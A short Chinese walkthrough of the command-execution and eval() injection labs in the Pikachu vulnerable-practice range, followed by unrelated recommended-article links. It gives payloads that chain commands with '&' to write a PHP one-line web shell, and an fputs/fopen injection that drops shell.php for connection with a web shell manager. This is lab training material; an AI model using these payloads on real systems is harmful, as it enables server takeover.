Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
AC赳赳老秦1 分钟前
软件组件自动化的革命:DeepSeek 引领高效开发新时代
运维·人工智能·算法·云原生·maven·devops·deepseek
之歆1 分钟前
LVS 负载均衡完全指南
运维·负载均衡·lvs
Web极客码14 分钟前
用 SSH Key 认证提升文件传输安全:SFTP/SSH 加固实战(适合站点运维与外贸站)
运维·安全·ssh
zhojiew19 分钟前
在中国区EKS集群使用 kgateway 代理 Lambda 函数的实践过程
运维·envoy
Channing Lewis38 分钟前
为什么部署的项目会耗尽系统句柄
服务器
独行soc2 小时前
2026年渗透测试面试题总结-25(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
小李独爱秋2 小时前
模拟面试:什么是容器技术,Docker是什么?
运维·docker·容器·面试·职场和发展
山峰哥2 小时前
SQL调优实战:从索引失效到性能飙升的破局之道
服务器·数据库·sql·性能优化·编辑器·深度优先
玩具猴_wjh2 小时前
JWT优化方案
java·服务器·数据库
yangyanping201082 小时前
系统监控Prometheus之Docker安装部署Prometheus
运维·docker·容器·prometheus